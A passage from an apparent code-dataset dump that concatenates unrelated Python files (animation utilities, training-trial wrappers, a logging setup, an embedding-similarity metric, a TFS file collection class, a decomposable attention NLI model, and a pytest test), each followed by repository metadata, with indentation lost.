self.ax = self.fig.add_axes([0, 0, 1, 1],projection='3d') if d==3 else self.fig.add_axes([0, 0, 1, 1])
#self.ax.axis('equal')
xyzmin = self.qt.min(0).min(0)#.min(dim=0)[0].min(dim=0)[0]
xyzmax = self.qt.max(0).max(0)#.max(dim=0)[0].max(dim=0)[0]
delta = xyzmax-xyzmin
lower = xyzmin-.1*delta; upper = xyzmax+.1*delta
if lims is None:
lims = (min(lower),max(upper)),(min(lower),max(upper)),(min(lower),max(upper))
self.ax.set_xlim(lims[0])
self.ax.set_ylim(lims[1])
if d==3: self.ax.set_zlim(lims[2])
if d!=3: self.ax.set_aspect("equal")
#elf.ax.auto_scale_xyz()
empty = d*[[]]
self.colors = np.random.choice([f"C{i}" for i in range(10)],size=n,replace=False)
self.objects = {
'pts':sum([self.ax.plot(*empty, "o", ms=6,color=self.colors[i]) for i in range(n)], []),
'traj_lines':sum([self.ax.plot(*empty, "-",color=self.colors[i],lw=traj_lw) for i in range(n)], []),
}
def init(self):
empty = 2*[[]]
for obj in self.objects.values():
for elem in obj:
elem.set_data(*empty)
#if self.qt.shape[-1]==3: elem.set_3d_properties([])
return sum(self.objects.values(),[])
def update(self, i=0):
T,n,d = self.qt.shape
trail_len = 150
for j in range(n):
# trails
xyz = self.qt[max(i - trail_len,0): i + 1,j,:]
#chunks = xyz.shape[0]//10
#xyz_chunks = torch.chunk(xyz,chunks)
#for i,xyz in enumerate(xyz_chunks):
self.objects['traj_lines'][j].set_data(*xyz[...,:2].T)
if d==3: self.objects['traj_lines'][j].set_3d_properties(xyz[...,2].T)
self.objects['pts'][j].set_data(*xyz[-1:,...,:2].T)
if d==3: self.objects['pts'][j].set_3d_properties(xyz[-1:,...,2].T)
#self.fig.canvas.draw()
return sum(self.objects.values(),[])
def animate(self):
return animation.FuncAnimation(self.fig,self.update,frames=self.qt.shape[0],
interval=33,init_func=self.init,blit=True).to_html5_video()
class PendulumAnimation(Animation):
def __init__(self, qt,*args,**kwargs):
super().__init__(qt,*args,**kwargs)
empty = self.qt.shape[-1] * [[]]
self.objects["pts"] = sum([self.ax.plot(*empty, "o", ms=10,c=self.colors[i]) for i in range(self.qt.shape[1])], [])
def update(self, i=0):
return super().update(i)
def helix(Ns=1000,radius=.05,turns=25):
t = np.linspace(0,1,Ns)
xyz = np.zeros((Ns,3))
xyz[:,0] = np.cos(2*np.pi*Ns*t*turns)*radius
xyz[:,1] = np.sin(2*np.pi*Ns*t*turns)*radius
xyz[:,2] = t
xyz[:,:2][(t>.9)|(t<.1)]=0
return xyz
def align2ref(refs,vecs):
""" inputs [refs (n,3), vecs (N,3)]
outputs [aligned (n,N,3)]
assumes vecs are pointing along z axis"""
n,_ = refs.shape
N,_ = vecs.shape
norm = np.sqrt((refs**2).sum(-1))
v = refs/norm[:,None]
A = np.zeros((n,3,3))
A[:,:,2] += v
A[:,2,:] -= v
M = (np.eye(3)+A+(A@A)/(1+v[:,2,None,None]))
scaled_vecs = vecs[None]+0*norm[:,None,None] #broadcast to right shape
scaled_vecs[:,:,2] *= norm[:,None]#[:,None,None]
return (M[:,None]@scaled_vecs[...,None]).squeeze(-1)
class CoupledPendulumAnimation(PendulumAnimation):
def __init__(self, *args, spring_lw=.6,spring_r=.2,**kwargs):
super().__init__(*args, **kwargs)
empty = self.qt.shape[-1]*[[]]
self.objects["springs"] = self.ax.plot(*empty,c='k',lw=spring_lw)#
#self.objects["springs"] = sum([self.ax.plot(*empty,c='k',lw=2) for _ in range(self.n-1)],[])
self.helix = helix(200,radius=spring_r,turns=10)
def update(self,i=0):
qt_padded = np.concatenate([0*self.qt[i,:1],self.qt[i,:]],axis=0)
diffs = qt_padded[1:]-qt_padded[:-1]
x,y,z = (align2ref(diffs,self.helix)+qt_padded[:-1][:,None]).reshape(-1,3).T
self.objects['springs'][0].set_data(x,y)
self.objects['springs'][0].set_3d_properties(z)
return super().update(i)
from collections.abc import Iterable
@export
class hnn_trial(object):
""" Assumes trainer is an object of type Trainer, trains for num_epochs which may be an
integer or an iterable containing intermediate points at which to save.
Pulls out special (resume, save, early_stop_metric, local_rank) args from the cfg """
def __init__(self,make_trainer,strict=True):
self.make_trainer = make_trainer
self.strict=strict
def __call__(self,cfg,i=None):
try:
cfg.pop('local_rank',None) #TODO: properly handle distributed
resume = cfg.pop('resume',False)
save = cfg.pop('save',False)
if i is not None:
orig_suffix = cfg.setdefault('trainer_config',{}).get('log_suffix','')
cfg['trainer_config']['log_suffix'] = os.path.join(orig_suffix,f'trial{i}/')
trainer = self.make_trainer(**cfg)
trainer.logger.add_scalars('config',flatten_dict(cfg))
epochs = cfg['num_epochs'] if isinstance(cfg['num_epochs'],Iterable) else [cfg['num_epochs']]
if resume: trainer.load_checkpoint(None if resume==True else resume)
epochs = [e for e in epochs if e>trainer.epoch]
for epoch in epochs:
trainer.train_to(epoch)
if save: cfg['saved_at']=trainer.save_checkpoint()
outcome = trainer.ckpt['outcome']
trajectories = []
for mb in trainer.dataloaders['test']:
trajectories.append(pred_and_gt(trainer.dataloaders['test'].dataset,trainer.model,mb))
torch.save(np.concatenate(trajectories),f"./{cfg['network']}_{cfg['net_config']['group']}_{i}.t")
except Exception as e:
if self.strict: raise
outcome = e
del trainer
return cfg, outcome
@export
class ode_trial(object):
""" Assumes trainer is an object of type Trainer, trains for num_epochs which may be an
integer or an iterable containing intermediate points at which to save.
Pulls out special (resume, save, early_stop_metric, local_rank) args from the cfg """
def __init__(self,make_trainer,strict=True):
self.make_trainer = make_trainer
self.strict=strict
def __call__(self,cfg,i=None):
try:
cfg.pop('local_rank',None) #TODO: properly handle distributed
resume = cfg.pop('resume',False)
save = cfg.pop('save',False)
if i is not None:
orig_suffix = cfg.setdefault('trainer_config',{}).get('log_suffix','')
cfg['trainer_config']['log_suffix'] = os.path.join(orig_suffix,f'trial{i}/')
trainer = self.make_trainer(**cfg)
trainer.logger.add_scalars('config',flatten_dict(cfg))
epochs = cfg['num_epochs'] if isinstance(cfg['num_epochs'],Iterable) else [cfg['num_epochs']]
if resume: trainer.load_checkpoint(None if resume==True else resume)
epochs = [e for e in epochs if e>trainer.epoch]
for epoch in epochs:
trainer.train_to(epoch)
if save: cfg['saved_at']=trainer.save_checkpoint()
outcome = trainer.ckpt['outcome']
trajectories = []
for mb in trainer.dataloaders['test']:
trajectories.append(pred_and_gt_ode(trainer.dataloaders['test'].dataset,trainer.model,mb))
torch.save(np.concatenate(trajectories),f"./{cfg['network']}_{cfg['net_config']['group']}_{i}.t")
except Exception as e:
if self.strict: raise
outcome = e
del trainer
return cfg, outcome
| 37.862144
| 139
| 0.613709
|
795006762868c728050c23e208f30b26853853bb
| 600
|
py
|
Python
|
concolic/concolic/__init__.py
|
msymt/Laelaps
|
a9ab61eda5ba0e8d15fe1a5ce925087784743c36
|
[
"MIT"
] | 16
|
2020-12-14T21:31:25.000Z
|
2022-01-26T03:21:40.000Z
|
concolic/concolic/__init__.py
|
msymt/Laelaps
|
a9ab61eda5ba0e8d15fe1a5ce925087784743c36
|
[
"MIT"
] | 3
|
2021-07-27T19:36:05.000Z
|
2021-12-31T02:20:53.000Z
|
concolic/concolic/__init__.py
|
msymt/Laelaps
|
a9ab61eda5ba0e8d15fe1a5ce925087784743c36
|
[
"MIT"
] | 8
|
2020-12-30T13:55:20.000Z
|
2022-01-17T03:20:36.000Z
|
import logging
import sys
import os
import shutil
LOGDIR = 'logfiles'
if os.path.exists(LOGDIR):
shutil.rmtree(LOGDIR)
os.makedirs(LOGDIR)
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
# propagate to Angr for STDIO
# ch = logging.StreamHandler(sys.stdout)
# logger.addHandler(ch)
# we handle fh
fh = logging.FileHandler(filename="./logfiles/laelaps.txt",mode='w')
logger.addHandler(fh)
formatter = logging.Formatter('%(asctime)s | %(name)s | %(levelname)s - %(message)s')
fh.setFormatter(formatter)
# well let STDIO handled in Angr for now
# logger.propagate = False
| 19.354839
| 85
| 0.745
|
7950067b6df40b780655b33074d50ccc952d0ea7
| 6,772
|
py
|
Python
|
avatar/relgan/utils/metrics/DocEmbSim.py
|
Julian-Theis/AVATAR
|
24fcd6eaa26f413be528a160d865d5d7e49a780b
|
[
"MIT"
] | 7
|
2020-12-22T12:09:14.000Z
|
2022-03-29T12:50:35.000Z
|
avatar/relgan/utils/metrics/DocEmbSim.py
|
ProminentLab/AVATAR
|
a20c767d8739a52f538927b4ec3d528952263d5a
|
[
"MIT"
] | 10
|
2020-11-13T17:45:59.000Z
|
2022-02-10T00:50:38.000Z
|
avatar/relgan/utils/metrics/DocEmbSim.py
|
ProminentLab/AVATAR
|
a20c767d8739a52f538927b4ec3d528952263d5a
|
[
"MIT"
] | 2
|
2020-03-26T22:27:27.000Z
|
2020-07-07T22:36:41.000Z
|
import collections
import math
import random
import nltk
import numpy as np
import tensorflow as tf
from scipy.spatial.distance import cosine
from avatar.relgan.utils.metrics.Metrics import Metrics
class DocEmbSim(Metrics):
def __init__(self, oracle_file=None, generator_file=None, num_vocabulary=None, name='DocEmbSim'):
super().__init__()
self.name = name
self.oracle_sim = None
self.gen_sim = None
self.is_first = True
self.oracle_file = oracle_file
self.generator_file = generator_file
self.num_vocabulary = num_vocabulary
self.batch_size = 64
self.embedding_size = 32
self.data_index = 0
self.valid_examples = None
def get_score(self):
if self.is_first:
self.get_oracle_sim()
self.is_first = False
self.get_gen_sim()
return self.get_dis_corr()
def get_frequent_word(self):
if self.valid_examples is not None:
return self.valid_examples
import collections
words = []
with open(self.oracle_file, 'r') as file:
for line in file:
text = nltk.word_tokenize(line)
text = list(map(int, text))
words += text
counts = collections.Counter(words)
new_list = sorted(words, key=lambda x: -counts[x])
word_set = list(set(new_list))
if len(word_set) < self.num_vocabulary // 10:
self.valid_examples = word_set
return word_set
else:
self.valid_examples = word_set[0: self.num_vocabulary//10] # choose 1/10 words with the highest frequency
return word_set[0: self.num_vocabulary//10]
def read_data(self, file):
words = []
with open(file, 'r') as file:
for line in file:
text = nltk.word_tokenize(line)
words.append(text)
return words
def generate_batch(self, batch_size, num_skips, skip_window, data=None):
assert batch_size % num_skips == 0
assert num_skips <= 2 * skip_window
batch = np.ndarray(shape=(batch_size), dtype=np.int32)
labels = np.ndarray(shape=(batch_size, 1), dtype=np.int32)
span = 2 * skip_window + 1 # [ skip_window target skip_window ]
buffer = collections.deque(maxlen=span) # deque to slide the window
for _ in range(span):
buffer.append(data[self.data_index])
self.data_index = (self.data_index + 1) % len(data)
for i in range(batch_size // num_skips):
target = skip_window # target label at the center of the buffer
targets_to_avoid = [skip_window]
for j in range(num_skips):
while target in targets_to_avoid:
target = random.randint(0, span - 1)
targets_to_avoid.append(target)
batch[i * num_skips + j] = buffer[skip_window]
labels[i * num_skips + j, 0] = buffer[target]
buffer.append(data[self.data_index])
self.data_index = (self.data_index + 1) % len(data)
return batch, labels
def get_wordvec(self, file):
graph = tf.Graph()
batch_size = self.batch_size
embedding_size = self.embedding_size
vocabulary_size = self.num_vocabulary
num_sampled = 64
if num_sampled > vocabulary_size:
num_sampled = vocabulary_size
num_steps = 2
skip_window = 1 # How many words to consider left and right.
num_skips = 2 # How many times to reuse an input to generate a label.
if self.valid_examples is None:
self.get_frequent_word()
with graph.as_default():
# Input data.
train_dataset = tf.placeholder(tf.int32, shape=[batch_size])
train_labels = tf.placeholder(tf.int32, shape=[batch_size, 1])
valid_dataset = tf.constant(self.valid_examples, dtype=tf.int32)
# initial Variables.
embeddings = tf.Variable(
tf.random_uniform([vocabulary_size, embedding_size], -1.0, 1.0, seed=11))
softmax_weights = tf.Variable(
tf.truncated_normal([vocabulary_size, embedding_size],
stddev=1.0 / math.sqrt(embedding_size), seed=12))
softmax_biases = tf.Variable(tf.zeros([vocabulary_size]))
# Model.
# Look up embeddings for inputs.
embed = tf.nn.embedding_lookup(embeddings, train_dataset)
# Compute the softmax loss, using a sample of the negative labels each time.
loss = tf.reduce_mean(
tf.nn.sampled_softmax_loss(weights=softmax_weights, biases=softmax_biases, inputs=embed,
labels=train_labels, num_sampled=num_sampled, num_classes=vocabulary_size))
optimizer = tf.train.AdagradOptimizer(1.0).minimize(loss)
# Compute the similarity between minibatch examples and all embeddings.
norm = tf.sqrt(tf.reduce_sum(tf.square(embeddings), 1, keep_dims=True))
normalized_embeddings = embeddings / norm
valid_embeddings = tf.nn.embedding_lookup(
normalized_embeddings, valid_dataset)
similarity = tf.matmul(valid_embeddings, tf.transpose(normalized_embeddings))
data = self.read_data(file)
with tf.Session(graph=graph) as session:
tf.global_variables_initializer().run()
average_loss = 0
generate_num = len(data)
for step in range(num_steps):
for index in range(generate_num):
cur_batch_data, cur_batch_labels = self.generate_batch(
batch_size, num_skips, skip_window, data[index])
feed_dict = {train_dataset: cur_batch_data, train_labels: cur_batch_labels}
_, l = session.run([optimizer, loss], feed_dict=feed_dict)
average_loss += l
similarity_value = similarity.eval()
return similarity_value
def get_oracle_sim(self):
self.oracle_sim = self.get_wordvec(self.oracle_file) # evaluate word embedding on the models file
def get_gen_sim(self):
self.gen_sim = self.get_wordvec(self.generator_file) # evaluate word embedding on the generator file
def get_dis_corr(self):
if len(self.oracle_sim) != len(self.gen_sim):
raise ArithmeticError
corr = 0
for index in range(len(self.oracle_sim)):
corr += (1 - cosine(np.array(self.oracle_sim[index]), np.array(self.gen_sim[index])))
return np.log10(corr / len(self.oracle_sim))
| 41.802469
| 118
| 0.612965
|
7950078596d2c065a217c94205bfc57e7ee8e2e1
| 10,310
|
py
|
Python
|
tfs/collection.py
|
st-walker/tfs
|
7a229f4fecbf04d544c5116d79a281e4365ccd1d
|
[
"MIT"
] | 5
|
2019-02-18T14:38:59.000Z
|
2021-12-14T15:33:50.000Z
|
tfs/collection.py
|
st-walker/tfs
|
7a229f4fecbf04d544c5116d79a281e4365ccd1d
|
[
"MIT"
] | 54
|
2019-02-19T14:44:36.000Z
|
2022-02-16T15:07:53.000Z
|
tfs/collection.py
|
st-walker/tfs
|
7a229f4fecbf04d544c5116d79a281e4365ccd1d
|
[
"MIT"
] | 4
|
2019-10-17T08:58:57.000Z
|
2022-02-15T15:55:18.000Z
|
"""
Collection
----------------------
Advanced **TFS** files reading and writing functionality.
"""
import pathlib
from pandas import DataFrame
from tfs.frame import TfsDataFrame
from tfs.reader import read_tfs
from tfs.writer import write_tfs
class _MetaTfsCollection(type):
"""
Metaclass for TfsCollection. It takes the class attributes declared as
`Tfs(...)` and replaces it for a property getter and setter. Check
TfsCollection docs.
"""
def __new__(mcs, cls_name, bases, dct: dict):
new_dict = dict(dct)
new_dict["_two_plane_names"] = []
# for name in dct:
for key, value in dct.items():
try:
args = value.args
kwargs = value.kwargs
except AttributeError:
continue
new_props = _define_property(args, kwargs)
try:
prop_x, prop_y = new_props
new_dict.pop(key)
new_dict["_two_plane_names"].append(key)
new_dict[key + "_x"] = prop_x
new_dict[key + "_y"] = prop_y
except TypeError:
new_dict[key] = new_props
return super().__new__(mcs, cls_name, bases, new_dict)
class TfsCollection(metaclass=_MetaTfsCollection):
"""
Abstract class to lazily load and write **TFS** files.
Classes inheriting from this abstract class will be able to define **TFS** files
as readable or writable, and read or write them just as attribute access or
assignments. All attributes will be read and written as ``TfsDataFrame`` objects.
Example:
If **./example** is a directory that contains two **TFS** files **beta_phase_x.tfs**
and **beta_phase_y.tfs** with `BETX` and `BETY` columns respectively:
.. sourcecode:: python
class ExampleCollection(TfsCollection)
# All TFS attributes must be marked with the Tfs(...) class, and generated attribute
# names will be appended with _x / _y depending on files found in "./example"
beta = Tfs("beta_phase_{}.tfs") # A TFS attribute
other_value = 7 # A traditional attribute.
def get_filename(template: str, plane: str) -> str:
return template.format(plane)
example = ExampleCollection("./example")
# Get the BETX / BETY column from "beta_phase_x.tfs":
beta_x_column = example.beta_x.BETX # / example.beta_x.BETY
# Get the BETY column from "beta_phase_y.tfs":
beta_y_column = example.beta_y.BETY
# The planes can also be accessed as items (both examples below work):
beta_y_column = example.beta["y"].BETY
beta_y_column = example.beta["Y"].BETY
# This will write an empty DataFrame to "beta_phase_y.tfs":
example.allow_write = True
example.beta["y"] = DataFrame()
If the file to be loaded is not defined for two planes then the attribute can be declared as:
``coupling = Tfs("getcouple.tfs", two_planes=False)`` and then accessed as
``f1001w_column = example.coupling.F1001W``.
No file will be loaded until the corresponding attribute is accessed and the loaded
``TfsDataFrame`` will be buffered, thus the user should expect an ``IOError`` if the requested
file is not in the provided directory (only the first time, but is better to always take it
into account!).
When a ``TfsDataFrame`` is assigned to one attribute, it will be set as the buffer value. If the
``self.allow_write`` attribute is set to ``True``, an assignment on one of the attributes will
trigger the corresponding file write.
"""
def __init__(self, directory: pathlib.Path, allow_write: bool = None):
self.directory = pathlib.Path(directory) if isinstance(directory, str) else directory
self.allow_write = False if allow_write is None else allow_write
self.maybe_call = _MaybeCall(self)
self._buffer = {}
def get_filename(self, *args, **kwargs):
"""
Return the filename to be loaded or written.
This function will get as parameters any parameter given to the Tfs(...) attributes. It must
return the filename to be written according to those parameters. If ``two_planes=False`` is
not present in the Tfs(...) definition, it will also be given the keyword argument
``plane="x"`` or ``plane="y"``.
"""
raise NotImplementedError("This is an abstract method, it should be implemented in subclasses.")
def write_to(self, *args, **kwargs):
"""
Returns the filename and `TfsDataFrame` to be written on assignments.
If this function is overwritten, it will replace ``get_filename(...)`` in file writes to
find out the filename of the file to be written. It also gets the value assigned as first
parameter. It must return a tuple (filename, tfs_data_frame).
"""
raise NotImplementedError("This is an abstract method, it should be implemented in subclasses.")
def clear(self):
"""
Clear the file buffer.
Any subsequent attribute access will try to load the corresponding file again.
"""
self._buffer = {}
def read_tfs(self, filename: str) -> TfsDataFrame:
"""
Reads the **TFS** file from ``self.directory`` with the given filename.
This function can be overwritten to use something instead of ``tfs-pandas`` to load the
files.
Arguments:
filename (str): The name of the file to load.
Returns:
A ``TfsDataFrame`` built from reading the requested file.
"""
tfs_data_df = read_tfs(self.directory / filename)
if "NAME" in tfs_data_df:
tfs_data_df = tfs_data_df.set_index("NAME", drop=False)
return tfs_data_df
def __getattr__(self, attr: str) -> object:
if attr in self._two_plane_names:
return TfsCollection._TwoPlanes(self, attr)
raise AttributeError(f"{self.__class__.__name__} object has no attribute {attr}")
def _load_tfs(self, filename: str):
try:
return self._buffer[filename]
except KeyError:
tfs_data = self.read_tfs(filename)
if "NAME" in tfs_data:
tfs_data = tfs_data.set_index("NAME", drop=False)
self._buffer[filename] = tfs_data
return self._buffer[filename]
def _write_tfs(self, filename: str, data_frame: DataFrame):
if self.allow_write:
write_tfs(self.directory / filename, data_frame)
self._buffer[filename] = data_frame
class _TwoPlanes(object):
def __init__(self, parent, attr):
self.parent = parent
self.attr = attr
def __getitem__(self, plane: str):
return getattr(self.parent, self.attr + "_" + plane.lower())
def __setitem__(self, plane: str, value):
setattr(self.parent, self.attr + "_" + plane.lower(), value)
class Tfs:
"""Class to mark attributes as **TFS** attributes.
Any parameter given to this class will be passed to the ``get_filename()`` and ``write_to()``
methods, together with the plane if ``two_planes=False`` is not present.
"""
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
# Private methods to define the properties ##################################
def _define_property(args, kwargs):
if "two_planes" not in kwargs:
return _define_property_two_planes(args, kwargs)
elif kwargs["two_planes"]:
kwargs.pop("two_planes")
return _define_property_two_planes(args, kwargs)
else:
kwargs.pop("two_planes")
def getter_funct(self):
return _getter(self, *args, **kwargs)
def setter_funct(self, tfs_data):
return _setter(self, tfs_data, *args, **kwargs)
return property(fget=getter_funct, fset=setter_funct)
def _define_property_two_planes(args, kwargs) -> tuple:
x_kwargs = dict(kwargs)
y_kwargs = dict(kwargs)
x_kwargs["plane"] = "x"
y_kwargs["plane"] = "y"
def x_getter_funct(self):
return _getter(self, *args, **x_kwargs)
def x_setter_funct(self, tfs_data):
return _setter(self, tfs_data, *args, **x_kwargs)
def y_getter_funct(self):
return _getter(self, *args, **y_kwargs)
def y_setter_funct(self, tfs_data):
return _setter(self, tfs_data, *args, **y_kwargs)
property_x = property(fget=x_getter_funct, fset=x_setter_funct)
property_y = property(fget=y_getter_funct, fset=y_setter_funct)
return property_x, property_y
def _getter(self, *args, **kwargs):
filename = self.get_filename(*args, **kwargs)
return self._load_tfs(filename)
def _setter(self, value, *args, **kwargs):
try:
filename, data_frame = self.write_to(value, *args, **kwargs)
self._write_tfs(filename, data_frame)
except NotImplementedError:
filename = self.get_filename(*args, **kwargs)
self._write_tfs(filename, value)
class _MaybeCall:
"""
Handles the maybe_call feature of the TfsCollection.
This class defines the `maybe_call` attribute in the instances of `TfsCollection`. To avoid
repetitive try / except blocks, this class allows you to do:
``meas.maybe_call.beta["x"](some_funct, args, kwargs)``.
If the requested file is available, the call is equivalent to: ``some_funct(args, kwargs)``, if
not then no function is called and the program continues.
"""
def __init__(self, parent):
self.parent = parent
def __getattr__(self, attr):
return _MaybeCall.MaybeCallAttr(self.parent, attr)
class MaybeCallAttr:
def __init__(self, parent, attr):
self.parent = parent
self.attr = attr
def __getitem__(self, item):
return _MaybeCall.MaybeCallAttr(self.parent, self.attr + "_" + item)
def __call__(self, function_call, *args, **kwargs):
try:
tfs_file = getattr(self.parent, self.attr)
except IOError:
return lambda funct: None # Empty function
return function_call(tfs_file, *args, **kwargs)
| 36.048951
| 104
| 0.63967
|
795007c97e62f75c45d0bc8b3e5c956c64244e48
| 9,616
|
py
|
Python
|
allennlp/models/decomposable_attention.py
|
nadgeri14/allennlp
|
2eefffaf71612263a1c20e8ce4107849cfd5efe3
|
[
"Apache-2.0"
] | null | null | null |
allennlp/models/decomposable_attention.py
|
nadgeri14/allennlp
|
2eefffaf71612263a1c20e8ce4107849cfd5efe3
|
[
"Apache-2.0"
] | null | null | null |
allennlp/models/decomposable_attention.py
|
nadgeri14/allennlp
|
2eefffaf71612263a1c20e8ce4107849cfd5efe3
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict, Optional, List, Any
import torch
from allennlp.common.checks import check_dimensions_match
from allennlp.data import TextFieldTensors, Vocabulary
from allennlp.models.model import Model
from allennlp.modules import FeedForward
from allennlp.modules import Seq2SeqEncoder, SimilarityFunction, TimeDistributed, TextFieldEmbedder
from allennlp.modules.matrix_attention.legacy_matrix_attention import LegacyMatrixAttention
from allennlp.nn import InitializerApplicator, RegularizerApplicator
from allennlp.nn.util import get_text_field_mask, masked_softmax, weighted_sum
from allennlp.training.metrics import CategoricalAccuracy
@Model.register("decomposable_attention")
class DecomposableAttention(Model):
"""
This ``Model`` implements the Decomposable Attention model described in [A Decomposable
Attention Model for Natural Language Inference](
https://www.semanticscholar.org/paper/A-Decomposable-Attention-Model-for-Natural-Languag-Parikh-T%C3%A4ckstr%C3%B6m/07a9478e87a8304fc3267fa16e83e9f3bbd98b27)
by Parikh et al., 2016, with some optional enhancements before the decomposable attention
actually happens. Parikh's original model allowed for computing an "intra-sentence" attention
before doing the decomposable entailment step. We generalize this to any
:class:`Seq2SeqEncoder` that can be applied to the premise and/or the hypothesis before
computing entailment.
The basic outline of this model is to get an embedded representation of each word in the
premise and hypothesis, align words between the two, compare the aligned phrases, and make a
final entailment decision based on this aggregated comparison. Each step in this process uses
a feedforward network to modify the representation.
# Parameters
vocab : ``Vocabulary``
text_field_embedder : ``TextFieldEmbedder``
Used to embed the ``premise`` and ``hypothesis`` ``TextFields`` we get as input to the
model.
attend_feedforward : ``FeedForward``
This feedforward network is applied to the encoded sentence representations before the
similarity matrix is computed between words in the premise and words in the hypothesis.
similarity_function : ``SimilarityFunction``
This is the similarity function used when computing the similarity matrix between words in
the premise and words in the hypothesis.
compare_feedforward : ``FeedForward``
This feedforward network is applied to the aligned premise and hypothesis representations,
individually.
aggregate_feedforward : ``FeedForward``
This final feedforward network is applied to the concatenated, summed result of the
``compare_feedforward`` network, and its output is used as the entailment class logits.
premise_encoder : ``Seq2SeqEncoder``, optional (default=``None``)
After embedding the premise, we can optionally apply an encoder. If this is ``None``, we
will do nothing.
hypothesis_encoder : ``Seq2SeqEncoder``, optional (default=``None``)
After embedding the hypothesis, we can optionally apply an encoder. If this is ``None``,
we will use the ``premise_encoder`` for the encoding (doing nothing if ``premise_encoder``
is also ``None``).
initializer : ``InitializerApplicator``, optional (default=``InitializerApplicator()``)
Used to initialize the model parameters.
regularizer : ``RegularizerApplicator``, optional (default=``None``)
If provided, will be used to calculate the regularization penalty during training.
"""
def __init__(
self,
vocab: Vocabulary,
text_field_embedder: TextFieldEmbedder,
attend_feedforward: FeedForward,
similarity_function: SimilarityFunction,
compare_feedforward: FeedForward,
aggregate_feedforward: FeedForward,
premise_encoder: Optional[Seq2SeqEncoder] = None,
hypothesis_encoder: Optional[Seq2SeqEncoder] = None,
initializer: InitializerApplicator = InitializerApplicator(),
regularizer: Optional[RegularizerApplicator] = None,
) -> None:
super().__init__(vocab, regularizer)
self._text_field_embedder = text_field_embedder
self._attend_feedforward = TimeDistributed(attend_feedforward)
self._matrix_attention = LegacyMatrixAttention(similarity_function)
self._compare_feedforward = TimeDistributed(compare_feedforward)
self._aggregate_feedforward = aggregate_feedforward
self._premise_encoder = premise_encoder
self._hypothesis_encoder = hypothesis_encoder or premise_encoder
self._num_labels = vocab.get_vocab_size(namespace="labels")
check_dimensions_match(
text_field_embedder.get_output_dim(),
attend_feedforward.get_input_dim(),
"text field embedding dim",
"attend feedforward input dim",
)
check_dimensions_match(
aggregate_feedforward.get_output_dim(),
self._num_labels,
"final output dimension",
"number of labels",
)
self._accuracy = CategoricalAccuracy()
self._loss = torch.nn.CrossEntropyLoss()
initializer(self)
def forward( # type: ignore
self,
premise: TextFieldTensors,
hypothesis: TextFieldTensors,
label: torch.IntTensor = None,
metadata: List[Dict[str, Any]] = None,
) -> Dict[str, torch.Tensor]:
"""
# Parameters
premise : TextFieldTensors
From a ``TextField``
hypothesis : TextFieldTensors
From a ``TextField``
label : torch.IntTensor, optional, (default = None)
From a ``LabelField``
metadata : ``List[Dict[str, Any]]``, optional, (default = None)
Metadata containing the original tokenization of the premise and
hypothesis with 'premise_tokens' and 'hypothesis_tokens' keys respectively.
# Returns
An output dictionary consisting of:
label_logits : torch.FloatTensor
A tensor of shape ``(batch_size, num_labels)`` representing unnormalised log
probabilities of the entailment label.
label_probs : torch.FloatTensor
A tensor of shape ``(batch_size, num_labels)`` representing probabilities of the
entailment label.
loss : torch.FloatTensor, optional
A scalar loss to be optimised.
"""
embedded_premise = self._text_field_embedder(premise)
embedded_hypothesis = self._text_field_embedder(hypothesis)
premise_mask = get_text_field_mask(premise).float()
hypothesis_mask = get_text_field_mask(hypothesis).float()
if self._premise_encoder:
embedded_premise = self._premise_encoder(embedded_premise, premise_mask)
if self._hypothesis_encoder:
embedded_hypothesis = self._hypothesis_encoder(embedded_hypothesis, hypothesis_mask)
projected_premise = self._attend_feedforward(embedded_premise)
projected_hypothesis = self._attend_feedforward(embedded_hypothesis)
# Shape: (batch_size, premise_length, hypothesis_length)
similarity_matrix = self._matrix_attention(projected_premise, projected_hypothesis)
# Shape: (batch_size, premise_length, hypothesis_length)
p2h_attention = masked_softmax(similarity_matrix, hypothesis_mask)
# Shape: (batch_size, premise_length, embedding_dim)
attended_hypothesis = weighted_sum(embedded_hypothesis, p2h_attention)
# Shape: (batch_size, hypothesis_length, premise_length)
h2p_attention = masked_softmax(similarity_matrix.transpose(1, 2).contiguous(), premise_mask)
# Shape: (batch_size, hypothesis_length, embedding_dim)
attended_premise = weighted_sum(embedded_premise, h2p_attention)
premise_compare_input = torch.cat([embedded_premise, attended_hypothesis], dim=-1)
hypothesis_compare_input = torch.cat([embedded_hypothesis, attended_premise], dim=-1)
compared_premise = self._compare_feedforward(premise_compare_input)
compared_premise = compared_premise * premise_mask.unsqueeze(-1)
# Shape: (batch_size, compare_dim)
compared_premise = compared_premise.sum(dim=1)
compared_hypothesis = self._compare_feedforward(hypothesis_compare_input)
compared_hypothesis = compared_hypothesis * hypothesis_mask.unsqueeze(-1)
# Shape: (batch_size, compare_dim)
compared_hypothesis = compared_hypothesis.sum(dim=1)
aggregate_input = torch.cat([compared_premise, compared_hypothesis], dim=-1)
label_logits = self._aggregate_feedforward(aggregate_input)
label_probs = torch.nn.functional.softmax(label_logits, dim=-1)
output_dict = {
"label_logits": label_logits,
"label_probs": label_probs,
"h2p_attention": h2p_attention,
"p2h_attention": p2h_attention,
}
if label is not None:
loss = self._loss(label_logits, label.long().view(-1))
self._accuracy(label_logits, label)
output_dict["loss"] = loss
if metadata is not None:
output_dict["premise_tokens"] = [x["premise_tokens"] for x in metadata]
output_dict["hypothesis_tokens"] = [x["hypothesis_tokens"] for x in metadata]
return output_dict
def get_metrics(self, reset: bool = False) -> Dict[str, float]:
return {"accuracy": self._accuracy.get_metric(reset)}
| 47.60396
| 161
| 0.710483
|
7950083d20f9939b6bcce14e6e9f15c238e75152
| 1,278
|
py
|
Python
|
ct/src/test_provision_and_traffic.py
|
testillano/h1mock
|
76e74c71311bd3c3cf1e41c80d7b18e88e9f182c
|
[
"MIT"
] | 1
|
2021-12-16T19:11:46.000Z
|
2021-12-16T19:11:46.000Z
|
ct/src/test_provision_and_traffic.py
|
testillano/h1mock
|
76e74c71311bd3c3cf1e41c80d7b18e88e9f182c
|
[
"MIT"
] | null | null | null |
ct/src/test_provision_and_traffic.py
|
testillano/h1mock
|
76e74c71311bd3c3cf1e41c80d7b18e88e9f182c
|
[
"MIT"
] | null | null | null |
import pytest
import json
def test_001_provision_rules_and_functions(resources, h1mc_admin):
# Send POST
rulesAndFunctionsProvision = resources("foo-bar")
response = h1mc_admin.postData("app/v1/provision/myprovision", rulesAndFunctionsProvision)
# Verify response
assert response.status_code == 201
assert response.json()["result"] == "success: basename file 'myprovision' has been loaded"
